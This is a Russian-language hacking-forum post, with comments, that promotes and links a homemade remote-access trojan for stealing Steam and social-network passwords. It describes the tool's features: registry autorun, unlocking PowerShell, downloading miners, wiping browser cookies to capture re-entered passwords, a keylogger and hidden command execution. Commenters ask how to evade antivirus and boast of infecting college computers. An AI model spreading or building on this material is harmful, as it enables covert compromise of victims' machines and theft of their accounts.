Загрузка...
Author's article Stealing passwords "from everything" with a small RMS
  1. Енот272_inactive171964
    Енот272_inactive171964 Topic starter Sep 29, 2017 Ушел на покой 372 Sep 6, 2017
    Этот гайд завершает мою эпопею с написанием собственного RMS (RAT). Легкий и маленький дистрибутив имеет ряд приятных функций, которые помогут вам угнать пароли от стима, одноклассников и вконтакта, а так же скачивать ПО и запускать скрипты PowerShell. Чем так хорош PowerShell? Набери в гугле это словосочетание "powershell hack" и офигей от моря различных скриптов которые позволят расширить функционал моей тулзы до небес)))

    Итак, от предисловия к делу. Основные команды управления будут показаны в видео, а так же будет показан процесс работы программы. Вы так же её можете скачать по адресу rar архив и отредактировать конфиг бота под себя - https://yadi.sk/d/4PC45dbj3NLYav
    Или скомпилировать код с помощь CX_FREEZE самостоятельно для любой винды, начиная с висты.
    Скоро код по-человечески выложу на гитхаб (уже) [https://github.com/enot-pogromist/simple_rat_bot] , там же постепенно будут появляться сниппеты PowerShell'а.
    Видео - Гайд:

    Code
    ВНИМАНИЕ! ТЕПЕРЬ РАЗАРХИВИРУЕМ и ЗАПУСКАЕМ ИЗ ПАПКИ С:\USERS\; этот костыль уберу, можно будет скидывать в любую папку и запускать из неё же.



    Основной Гайд:

    [IMG]

    Итак, при запуске sfx архива мы получаем программу, запущенную от имени администратора, для того что бы изменить два параметра реестра - на автозапуск и получение разрешения на запуск powershell скриптов, которые мы будем качать потом из интернета.

    [IMG]

    В коде функция старт выглядит именно так. Она и добавляет эти два ключа. Вызывается эта функция командой:

    [IMG]

    Далее идет стандартное приветствие, когда наш бот запустится на машине пользователя. Так мы поймем, что ключи прописаны
    и все работает штатно. Следующей командой мы можем, например, докачать какой нибудь майнер:

    [IMG]

    Нам нужно будет набрать /wget и адрес файла в интернете. Так же можно скачивать любые другие программы и скрипты.
    А следующей функцией у нас будет удаление куки всех браузеров и стима:

    [IMG]

    Она позволит стереть регистрационные данные пользователя, заставив его ввести повторно все пароли, от всех акков.
    Но пока я остановился на пяти вариантах кукис, для Хрома, ЯндексБро, Стима, Лисицы и Оперы:

    [IMG]

    Шлите мне местоположения куки других игр/приложений/всей ерунды для того что бы программа стала удобнее. Не хочется
    лазить и тереть ручками всё самому.

    А вот две следующих команды позволят нам начать слежку за клавиатурой и загрузку ***** когда мы захотим.

    [IMG]

    Эта команда запусит Кейлоггер.

    [IMG]

    А эта позволит нам скачать ****.... А теперь я расскажу еще об трех командах которые вам пригодятся, например, запуск
    программ с любыми параметрами, причем скрытый:

    [IMG]

    Это команда /cmd, а за ней будут следовать любые параметры, какие вам заблагорассудится, отчет о том как работает
    присылается тут же и вы можете просмотреть все ****.

    [IMG]

    А так же есть стандартные программы перемещения по дирректориям - ls и cd соответственно, их функционал соответствует
    BusyBox, ничего особенного вообщем:

    [IMG]

    В результате работы над этим скриптом пострадала 1 (компьютерная) мышка, 1 банка кофе, 1 блок сигарет, 1 мозг, моё
    самоуважение.

    PS. Вебка работает только тогда - когда программа - скрипт, как компилируется - падает и не поднимается. За сим эту хрень
    выбрасываю в угоду скорости и надежности.

    ЗЫ: Подпишись на Ютьюб, тебе жалко шо ле?

    #МояСтатья
     

Comments

    1. chiosh
      chiosh Oct 4, 2017 Чем жиже мысли,тем гуще их понос. 5 Nov 4, 2016
    2. Andy_Garsia
      Andy_Garsia Oct 4, 2017 Banned 611 Dec 20, 2016
      Годная статья, попробовать можно.
      Автор радует своими статьями.
       
    3. Kaleb80
      Kaleb80 Oct 4, 2017 57 Sep 27, 2017
      у меня все нормально разархивировалось.
       
    4. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 4, 2017 Ушел на покой 372 Sep 6, 2017
      Бро, либо интернет у тебя ужасный, либо с архиватором шото.
       
    5. tihon49
      tihon49 Oct 4, 2017 0 Apr 12, 2017
      У меня нет файла setup.py и в целом сильно отличается состав распакованного. У меня намного больше, чем у тебя в видео, файлов.
       
    6. CrazyShadow
      CrazyShadow Oct 4, 2017 0 Jan 31, 2017
      Го про то, как все это закриптовать. Чтобы антивирусы не палили
       
    7. СаркисДаров
      Антивирус палиит
       
    8. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 4, 2017 Ушел на покой 372 Sep 6, 2017
      почалося, спасибки школотронам, что кидали на вирус тотал))) будем криптовать)))
       
    9. Dreafs
      Dreafs Oct 4, 2017 Banned 148 Aug 14, 2016
      Спасибо , все получилось даже при работе мозга на 10% (БОЛЕЮ ШО ПИЗДА)
       
    10. Marguzix_inactive190003
      Marguzix_inactive190003 Oct 9, 2017 privet kak dela lalala 0 Oct 9, 2017
      Невероятная годнота, захвачу компы в шараге))
       
    11. fuckbad_innactive
      Годно попробую не получиться напишу в вк
       
    12. PISOS_SHKOLNIK
      Ребят вылезает вот такая хрень что делать [IMG]
       
    13. Ast77175193
      Добра ветке есть вопрос возможно не разумный ))) пытаюсь построить логическую цепочку скоординированных действий аиимеено:
      Реально ли упакоыать в троян пуето свинчер и отправить в телегу к примеру утром отправить и вечером вернуть файл назад ))))) ???? Подскажите плиз))) реально или нкт ?
       
    14. Енот272_inactive171964
      Енот272_inactive171964 Topic starter Oct 24, 2017 Ушел на покой 372 Sep 6, 2017
      Что то ты забыл записать.
       
    15. SpaaDeeR
      SpaaDeeR Oct 28, 2017 :3 :3 :3 51 Oct 10, 2017
      спс помог
       
    16. incognitozro
      incognitozro Oct 29, 2017 Просто люблю наш lolzteam.net 2 Oct 24, 2017
    17. a4me
      Годно)
       
    18. aleksol
      aleksol Dec 7, 2017 1178 Dec 2, 2017
      это очень круто ))
       
    19. rafamont
      rafamont Dec 7, 2017 Пока ты спишь,твой враг качаеться 1 Mar 13, 2017
      Сделай пж кражу куков с chromium
       
    20. renameduser_225561
      renameduser_225561 Dec 7, 2017 2081542091302081903220914363 0 Dec 7, 2017
      Годно, + в копилку.
      Доработаю сам)
       
Top
Loading...